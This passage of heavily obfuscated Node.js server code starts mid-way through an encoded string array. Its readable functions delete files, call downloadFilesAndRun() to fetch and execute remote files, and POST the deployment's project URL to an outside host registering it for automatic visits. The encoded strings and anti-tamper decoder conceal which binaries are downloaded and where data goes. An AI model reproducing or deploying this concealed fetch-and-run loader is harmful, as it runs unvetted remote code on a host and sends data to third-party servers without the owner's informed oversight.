9DgnWjMHLywrLCLr5Cgu9BM9Uzsm','yMLUyxj5','wK1zBgi','y2rUCY5KB29UlMv1lM9YzW','ELLAt2W','BffMCeK','AxbZz1G','zMLSzvvYBa','p2vUy3j5ChrPB249BM9UzszMBg93pxH0BhmTCNbYEc12AxnPB24MC2vJDxjPDhK9CMvHBgL0EszZBMK9D3D3lMLPAI5Hzc5QCczMCd1MAxjLzM94jNbIAZ0','q0HAqMK','DhjHy2u','BuXfCNm','qvniEwC','BfbWsMW','vNfsAem','l2nVBMzPzY55yw1SiIa+l2rLDI9UDwXSidi+jJeGjG','yw1K','C3rYAw5NAwz5','vhLotK0','DxnLCNm','Bw5VD1u','zK1hAMC','y3vYBcaTBYaVzgv2l251BgWGlw0GmIaTCYaTDYaIjxTODhrWx2nVzgv9iIbODhrWCZOVl3D3DY55B3v0DwjLlMnVBq','AM5WtwK','ywXS','wvjMD0m','wgH6uvm','DgfAsfy','DwTStva','uhvIBgLJieTLEtO','BNbTigLZihj1BM5PBMC','C3rnC0O','tgDcr3a','zMLSzu5HBwu','Aw5JBhvKzxm','ls0Tls1cruDjtIbfqYbqqvjbtuvurvjtls0Tls0kqMDNCwHRAK9quu1cqNC9pqOTls0TluvorcbfqYbqqvjbtuvurvjtls0Tls0kls0Tls1cruDjtIbfqYbquKLwqvrfieTfws0Tls0TcK1iy0nbuuvfsu00nZKYu0v0uhfjDdf5D3fuzc8WyLLPzejXCfLwlYSRC2LoBMzcwxnKvvLVqw9hq0nXr1nnndKkqxDfsg9vuurrz0ffmwTiywzqAJa3CKPhk0HIB0GYzwTbstrYk2u2veWZoeDxqvnbtM5Uz1PYzw9rreyXnKfsyqOVvhn5thLgB1bRAeX4u2jLAeGVtKjfAKH0u1PhyurOtxfrpt0kls0Tls1ftKqGrumGufjjvKfursblrvKTls0Tlq','id4Vzgv2l251BgWGmJ4Mmq','zgf0ywiUzNLSAw5NlMLWlwrKBNmUy29T','BKrZAMK','ChLKB3G','wK9jsMW','AgvHzgvYCW','DMvTtKG','rMTVr0G','Ahr0Chm6lY9HCgKUDgvSzwDYyw0UB3jNl2jVDa','zfzywxi','y3vYBcaTCYaTlw1HEc10Aw1LideGAxb2nI5PCc5ZyG','ENzpu0y','rMfPBgvKihrVigv4DhjHy3qGChjPDMf0zuTLEsbVCIbWDwjSAwnlzxKGzNjVBsbVDxrWDxqU','ruLkDvy','EejNBfm','x19WCM90B19F','t3bRrwe','wxP1Dum','sLbpDNK','yLjrEg8','EeTHu2K','tKvAsefFs0vz','D3LiBMO','z2z3BM4','mJa1mW','EKvuzKW','tMTMtwu','uK5fzwm','AgTyC2S','yxbWBhK','zg5Z','qxbWigLZihj1BM5PBMC','mtyYmZy2nur3whDAuq','p3nUAt13D3CUyMLUzY5JB20My29Uz2vZDgLVBL9JB250CM9SpwjICIz1zhbFCMvSyxLFBw9Kzt1UyxrPDMuMywXWBJ1OmYzHBgXVD19PBNnLy3vYzt0XiW','tgHPwKS','zuvywfq','yM5ivMi','s214r2S','Dw5ZAgLMDa','BfHUvgW','BvnYs0e','EgTgB2y','rLbiseK','C3rYAw5N','DuD3ALa','veCGDMfYAwfIBgvZigLZigvTChr5lfnRAxbWAw5Nihb1C2GGBM9KzxmGDg8GveC','BKT6AMO','A0DzDM0','qMHyz1i','C3HTEgS','DeHcsMC','mJa4nW','EeHKtem','t25HtKy','yxPNrKW','cIaGDhvUBMvSoIa','EgfeB1e','qxbRs1K','y2XLyxi','q3zTyMO','vejQu3a','D2zcwhy','r3DNBMO','ChjVDg90ExbL','vxzNzvu','mJyWnJO0nZaWoJeXmdO4ntfMoJrKytm6nguYyZPJzgjMoJjLy2yVmti4','sLLtB1a','yM90','wKH4v1O','EvPfA0m','thrftgC','u0TfBwC','qKPUA0K','zhbeANi','cLb1yMXPy0TLEtOG','mtCYlJe2lJaUmI8ZmG','C2HVCNrFAwq','B1LKs00','Ahr0Chm6lY9HCM02nc5ZC3nZlM55yY5TBI9ZyG','CKzxC2G','Ahr0Chm6lY9YyxCUz2L0AhvIDxnLCMnVBNrLBNqUy29Tl01LDgfdDwjLwc9TzxrHlxj1BgvZlwrHDc9ZAw5Nl2DLBY9Nzw9ZAxrLl29Wzw5HAs5ZCNm','EwDizKS','C2n5','rwHzs1y','zNrsvxG','C3bSAxq','zg93BMXVywrFzgv0B3vY','q0zjua','uuT0she','DhvUBMvSic0TzwrNzs1PCc12zxjZAw9Uigf1Dg8Gls1JB25MAwCG','t3ruzue','whbizfy','Dhnev3u','AuH0sNq','rKTds0e','wfbXyMG'];_0x14e5=function(){return _0x277ab0;};return _0x14e5();}async function AddVisitTask(){const _0x3fea21={_0x1482ea:0x280,_0x1e3ed3:0x3e4,_0x578a15:0x2a3,_0x46e7d1:0x33d,_0x401742:0x4ec,_0x3e9ffb:0x484,_0x91d665:0x4f9,_0x27483c:0x64a,_0x2c5de1:0x5bc,_0x136e4c:0x561,_0x1c85c9:0x475,_0x4de539:0x417,_0x22fef8:0x471,_0x40dcb2:0x4e5,_0x1cfadc:0x42c,_0xe896ad:0x60c,_0x5db4e5:0x24a,_0x150486:0x8,_0xa9f6f5:0x15d,_0x82e0ed:0x3ca,_0x56a5ce:0x577,_0x11c0a6:0x3f3,_0x32996f:0x1c8,_0x16221e:0x349,_0x14865d:0x13c,_0x5726a5:0x19f,_0x5d06d6:0xa9,_0x26e517:0x7d,_0xa1340e:0x83,_0x3bcc87:0x9e,_0x546772:0x169,_0x473177:0x8b,_0x200b6f:0x5f4,_0x3fd33a:0x725,_0x191a16:0x79a,_0x3d4ac5:0x570,_0x41d93b:0x4e1,_0x22360d:0x571,_0x2388fc:0x120,_0x5ab7cb:0x12,_0x11e564:0x64,_0x1df4b2:0x784,_0x140a2e:0x779,_0x503e51:0x613,_0x44577a:0x6c0,_0x4d0df0:0x1e4,_0x311cc9:0x245,_0x224448:0xd0,_0x4877fc:0xbb,_0x5e965a:0x5a7,_0x3f0f33:0x601,_0x4476b2:0x3f2,_0xc35d7d:0x29f,_0x38779a:0x43,_0x2fd2d4:0x169,_0x197686:0x136,_0x365785:0x538,_0x158224:0x4d4,_0xaf3bb3:0x31,_0x286199:0x10d,_0x438bd0:0x4cd,_0x5b79c5:0x51b,_0x49bfc8:0x445,_0x23340c:0x3ed,_0x39ea7e:0x43d,_0x447914:0x3f9,_0x29f02b:0x3ec,_0x3add3c:0x41b},_0x515105={_0x4d0cc3:0xaf,_0x4d1b73:0x13d,_0x5d93f7:0x6},_0x169d47={_0x3143a9:0x5e,_0x1e2a27:0x175,_0x50344a:0x210};function _0x58f097(_0x2d4213,_0xf52946,_0x31b5c3,_0x2e7751){return _0xe14257(_0x2d4213-_0x169d47._0x3143a9,_0xf52946-_0x169d47._0x1e2a27,_0xf52946,_0x31b5c3-_0x169d47._0x50344a);}const _0x16ede0={};_0x16ede0[_0x58f097(_0x3fea21._0x1482ea,_0x3fea21._0x1e3ed3,0x281,_0x3fea21._0x578a15)]=function(_0x1ff1ba,_0x931f75){return _0x1ff1ba||_0x931f75;},_0x16ede0[_0x2eefb5(_0x3fea21._0x46e7d1,_0x3fea21._0x401742,_0x3fea21._0x3e9ffb,_0x3fea21._0x91d665)]=_0x2eefb5(_0x3fea21._0x27483c,0x5d3,_0x3fea21._0x2c5de1,_0x3fea21._0x136e4c),_0x16ede0['DmddQ']='application/json',_0x16ede0[_0x2eefb5(_0x3fea21._0x1c85c9,_0x3fea21._0x4de539,0x4ab,_0x3fea21._0x22fef8)]='automatic\x20access\x20task\x20added\x20successfully',_0x16ede0['tnSZV']=function(_0x4cecb1,_0x3925ba){return _0x4cecb1===_0x3925ba;},_0x16ede0[_0x2eefb5(_0x3fea21._0x40dcb2,_0x3fea21._0x1cfadc,0x544,_0x3fea21._0xe896ad)]='JYGUU',_0x16ede0[_0x58f097(_0x3fea21._0x5db4e5,-_0x3fea21._0x150486,_0x3fea21._0xa9f6f5,0x165)]=_0x2eefb5(_0x3fea21._0x82e0ed,_0x3fea21._0x56a5ce,0x4b4,_0x3fea21._0x11c0a6);const _0x83e959=_0x16ede0;if(_0x83e959[_0x58f097(_0x3fea21._0x32996f,_0x3fea21._0x16221e,0x281,_0x3fea21._0x14865d)](!AUTO_ACCESS,!PROJECT_URL)){console['log'](_0x83e959[_0x58f097(-0xae,_0x3fea21._0x5726a5,_0x3fea21._0x5d06d6,_0x3fea21._0x26e517)]);return;}function _0x2eefb5(_0xc23df8,_0x3edef3,_0x52873b,_0x516e0e){return _0x33ccd3(_0xc23df8-_0x515105._0x4d0cc3,_0x52873b- -_0x515105._0x4d1b73,_0x52873b-_0x515105._0x5d93f7,_0xc23df8);}try{const _0x56da51={};_0x56da51[_0x58f097(_0x3fea21._0xa1340e,0x98,_0x3fea21._0x3bcc87,_0x3fea21._0x546772)]=PROJECT_URL;const _0x1cb8a9={};_0x1cb8a9[_0x58f097(0x18,0x2a,0x48,-_0x3fea21._0x473177)]=_0x83e959[_0x2eefb5(_0x3fea21._0x200b6f,_0x3fea21._0x3fd33a,0x63a,_0x3fea21._0x191a16)];const _0x99938a={};_0x99938a[_0x2eefb5(0x4ae,_0x3fea21._0x3d4ac5,_0x3fea21._0x41d93b,_0x3fea21._0x22360d)]=_0x1cb8a9;const _0x4ad695=await axios[_0x58f097(_0x3fea21._0x2388fc,-0x172,-_0x3fea21._0x5ab7cb,-_0x3fea21._0x11e564)]('https://keep.gvrander.eu.org/add-url',_0x56da51,_0x99938a);console[_0x2eefb5(_0x3fea21._0x1df4b2,_0x3fea21._0x140a2e,_0x3fea21._0x503e51,_0x3fea21._0x44577a)](_0x83e959[_0x58f097(_0x3fea21._0x4d0df0,_0x3fea21._0x311cc9,_0x3fea21._0x224448,_0x3fea21._0x4877fc)]);}catch(_0x67eb03){if(_0x83e959[_0x2eefb5(_0x3fea21._0x5e965a,_0x3fea21._0x3f0f33,0x553,_0x3fea21._0x4476b2)](_0x83e959[_0x58f097(_0x3fea21._0xc35d7d,_0x3fea21._0x38779a,_0x3fea21._0x2fd2d4,_0x3fea21._0x197686)],_0x83e959[_0x2eefb5(0x638,0x6a4,_0x3fea21._0x365785,_0x3fea21._0x158224)]))return null;else console[_0x58f097(-_0x3fea21._0xaf3bb3,_0x3fea21._0x5726a5,0x57,_0x3fea21._0x286199)](_0x2eefb5(_0x3fea21._0x438bd0,_0x3fea21._0x5b79c5,_0x3fea21._0x49bfc8,_0x3fea21._0x23340c)+_0x67eb03[_0x2eefb5(_0x3fea21._0x39ea7e,_0x3fea21._0x447914,_0x3fea21._0x29f02b,_0x3fea21._0x3add3c)]);}}async function startserver(){const _0x4d0092={_0x3eed43:0x2ad,_0x33d183:0x47c,_0x523268:0x41d,_0x2d6055:0x9d,_0xd87471:0x5c,_0x4fee1c:0x185,_0x3b9898:0xb4,_0x5ee06d:0x2b8,_0x36a976:0x151,_0x357d51:0xff,_0x1bfe96:0x12c},_0x668d85={_0xdeed06:0x90,_0x18fe58:0x10d,_0x32b42b:0x59f},_0xb6ce7b={'lWWIG':function(_0x5867f7){return _0x5867f7();},'pKTlj':function(_0x2646c3){return _0x2646c3();},'zvOSF':function(_0x1e87be){return _0x1e87be();}};function _0xb81ef2(_0xaf4324,_0x15cd4a,_0x16684b,_0x52d914){return _0x33ccd3(_0xaf4324-0xfe,_0x15cd4a- -0x4d3,_0x16684b-0x156,_0x16684b);}_0xb6ce7b[_0x50d2be(_0x4d0092._0x3eed43,_0x4d0092._0x33d183,0x593,_0x4d0092._0x523268)](deleteNodes),_0xb6ce7b[_0xb81ef2(-_0x4d0092._0x2d6055,_0x4d0092._0xd87471,_0x4d0092._0x4fee1c,-_0x4d0092._0x3b9898)](cleanupOldFiles),argoType(),await downloadFilesAndRun();function _0x50d2be(_0x310c70,_0xd4d789,_0x1b7f38,_0x3ad30f){return _0xe14257(_0x310c70-_0x668d85._0xdeed06,_0xd4d789-_0x668d85._0x18fe58,_0xd4d789,_0x3ad30f-_0x668d85._0x32b42b);}AddVisitTask(),_0xb6ce7b[_0xb81ef2(_0x4d0092._0x5ee06d,_0x4d0092._0x36a976,_0x4d0092._0x357d51,_0x4d0092._0x1bfe96)](cleanFiles);}function _0x325c(_0x2edcf3,_0x2decbe){const _0x10b10e=_0x14e5();return _0x325c=function(_0x17d714,_0x5c77d6){_0x17d714=_0x17d714-(0x1*-0x57b+0x8f3*0x4+0x4*-0x751);let _0x11b921=_0x10b10e[_0x17d714];if(_0x325c['kNZDrr']===undefined){var _0x3499f4=function(_0x50e432){const _0x54b9cc='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x41cea7='',_0x185298='',_0x87e7a6=_0x41cea7+_0x3499f4;for(let _0x1663c6=-0x486*0x3+-0x15f4+0x2*0x11c3,_0x263dd7,_0x10149e,_0x145ad9=-0x12*-0xb9+-0x110a+0x408;_0x10149e=_0x50e432['charAt'](_0x145ad9++);~_0x10149e&&(_0x263dd7=_0x1663c6%(0x16c3*-0x1+0x16e5+-0x1e)?_0x263dd7*(0xcc*-0x22+-0x45d+-0x1*-0x1fb5)+_0x10149e:_0x10149e,_0x1663c6++%(-0x1401+-0xe*0x56+0x18b9))?_0x41cea7+=_0x87e7a6['charCodeAt'](_0x145ad9+(0x24*0x94+0xe0a+0x8b4*-0x4))-(0x21a1+0x24ce+-0x4665*0x1)!==0x48d+-0x2*0xdcc+0x170b?String['fromCharCode'](-0x244c+-0x911*-0x2+0x1329&_0x263dd7>>(-(-0x543+0x36d*0x2+-0x87*0x3)*_0x1663c6&0x1a1e+-0x3*-0x41b+-0x2669*0x1)):_0x1663c6:0x1*0x134d+0x724+-0x1a71){_0x10149e=_0x54b9cc['indexOf'](_0x10149e);}for(let _0x54ca0a=-0x15b*-0xb+0x1*-0x1bb4+0xccb*0x1,_0x305ee8=_0x41cea7['length'];_0x54ca0a<_0x305ee8;_0x54ca0a++){_0x185298+='%'+('00'+_0x41cea7['charCodeAt'](_0x54ca0a)['toString'](-0x1a5b+0x2275+-0x80a))['slice'](-(-0x1b49+-0x2*-0x82e+0xaef));}return decodeURIComponent(_0x185298);};_0x325c['dviZtg']=_0x3499f4,_0x2edcf3=arguments,_0x325c['kNZDrr']=!![];}const _0x3a2c0a=_0x10b10e[-0x1f91+0x7*0x2c3+0xc3c],_0x517a8a=_0x17d714+_0x3a2c0a,_0xf3d2b6=_0x2edcf3[_0x517a8a];if(!_0xf3d2b6){const _0x2e68c8=function(_0x492cb0){this['BLJYxg']=_0x492cb0,this['ypQQZB']=[-0x1*0x1ce6+-0xb7d+-0xdc*-0x2f,0x2619+0x1338+-0x3951,0x4*-0xad+-0x234a+-0x3*-0xcaa],this['GDPDhp']=function(){return'newState';},this['WakQFj']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*',this['fxEqUj']='[\x27|\x22].+[\x27|\x22];?\x20*}';};_0x2e68c8['prototype']['ppRLiU']=function(){const _0x498036=new RegExp(this['WakQFj']+this['fxEqUj']),_0x5eef36=_0x498036['test'](this['GDPDhp']['toString']())?--this['ypQQZB'][-0x135b+0x144*-0x6+0x1af4]:--this['ypQQZB'][-0xc0d+0x16c2+0x1*-0xab5];return this['rlmoaL'](_0x5eef36);},_0x2e68c8['prototype']['rlmoaL']=function(_0x1de3f5){if(!Boolean(~_0x1de3f5))return _0x1de3f5;return this['LGFAKs'](this['BLJYxg']);},_0x2e68c8['prototype']['LGFAKs']=function(_0xbf6796){for(let _0x24eba0=-0x186f+0x2*-0x1206+0x3c7b,_0x2f67ba=this['ypQQZB']['length'];_0x24eba0<_0x2f67ba;_0x24eba0++){this['ypQQZB']['push'](Math['round'](Math['random']())),_0x2f67ba=this['ypQQZB']['length'];}return _0xbf6796(this['ypQQZB'][0x2176+0x23a6+-0x451c]);},new _0x2e68c8(_0x325c)['ppRLiU'](),_0x11b921=_0x325c['dviZtg'](_0x11b921),_0x2edcf3[_0x517a8a]=_0x11b921;}else _0x11b921=_0xf3d2b6;return _0x11b921;},_0x325c(_0x2edcf3,_0x2decbe);}startserver(),app['listen'](PORT,()=>console[_0xe14257(-0x113,-0xc2,0x6a,0x28)](_0x33ccd3(0x7bd,0x6d2,0x6ae,0x61a)+PORT+'!'));